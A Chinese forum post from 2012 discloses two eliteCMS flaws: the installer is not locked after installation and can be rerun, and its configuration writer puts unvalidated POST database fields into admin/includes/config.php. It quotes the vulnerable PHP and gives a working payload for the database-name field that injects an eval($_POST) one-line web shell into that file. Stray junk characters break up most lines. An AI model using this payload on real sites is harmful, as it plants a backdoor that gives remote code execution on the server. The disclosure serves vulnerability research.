eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装* L! X1 @8 \: J' M ?
3 m) ~% f. W' T
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
6 n' `, [3 S$ m- b8 K: M8 U+ u我们来看代码:
: g* q- J! r: S" l
& A& N2 s( M$ E...
' b, G `: U$ e: C( @+ q7 x( |0 yelseif ($_GET['step'] == "4") {$ v$ i4 q5 _# j$ l
$file = "../admin/includes/config.php";" M" L8 R) t4 E
$write = "<?php\n"; M! v) N7 _* c( H6 G1 L& Q
$write .= "/**\n";
3 ?( r' ?. r; F V! a& L( @ $write .= "*\n";1 H! F9 n" G' R! ~( T3 N( o
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
5 I4 k7 T/ V! Y) [6 o; n' a9 {$ W...略...
0 l$ W( b9 L4 ^2 T) O* e $write .= "*\n";# r9 a- W6 U. u6 n- L9 `8 I
$write .= "*/\n";
- r. i7 u6 `9 A- y $write .= "\n";
* H( r9 f" g+ P) G6 f+ ^0 U $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";0 a! @, r8 F+ H9 H
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";' A9 n( B( f) z2 z' o
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
; c% O( K% L( Z' V/ F) |' X+ Z1 ~ $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
8 \& A3 W: O2 C# C& V6 A $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";) @0 w, @* l( M# s
$write .= "if (!\$connection) {\n";
- v6 d. b- x! L $write .= " die(\"Database connection failed\" .mysql_error());\n";
! ?. f. W3 B: @$ W7 t $write .= " \n";: g5 M' T3 [' F( ~: s
$write .= "} \n";
! H& M3 F/ F. a% F7 ~0 G $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";: [+ D/ Y7 q7 {! M; t' t
$write .= "if (!\$db_select) {\n";% A; l8 Z# ]( l2 O7 V9 X. y) d
$write .= " die(\"Database select failed\" .mysql_error());\n";
7 _ [/ ]$ i( N. d4 E2 F $write .= " \n";% L2 o- C5 u9 Q9 e5 b% z2 _% o
$write .= "} \n";
* q, O0 s. Z4 _. T/ k $write .= "?>\n";
M l5 C) a* ?$ k( _ / `. H7 _8 v+ X+ m% k, E7 W
$writer = fopen($file, 'w');/ Q d* f/ Q% a' ^3 M
...# z! r; N4 V! M3 [
: K3 E; E$ G m2 \在看代码:8 Y$ l( r. H! e# W: Z0 z
3 r3 W5 u+ F" l
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];1 |, a C: x7 i$ C9 G, F
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
. A( g8 }3 \/ R* L) F, A/ R$_SESSION['DB_USER'] = $_POST['DB_USER'];- c! }& @* `- Z) W0 U R4 d
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
, W0 `% k. F, @. x5 [# Q - Y& d7 F G" k" ~, P4 u, M
取值未作任何验证
9 H$ H( i5 q% ~! a6 h: {如果将数据库名POST数据:
1 E$ ?1 o) C2 S E( Z1 B& j
4 T$ z! ^, T& U6 v& c3 P"?><?php eval($_POST[c]);?><?php4 _5 O0 i9 k5 u% p |- t+ |7 \
9 t, Z2 W# ^( A' D) ^5 r. C* E将导致一句话后门写入/admin/includes/config.php
- t+ o+ c! X3 Y6 s" @- _, I |
发表于 2012-11-18 13:59:27
收藏
分享
支持
反对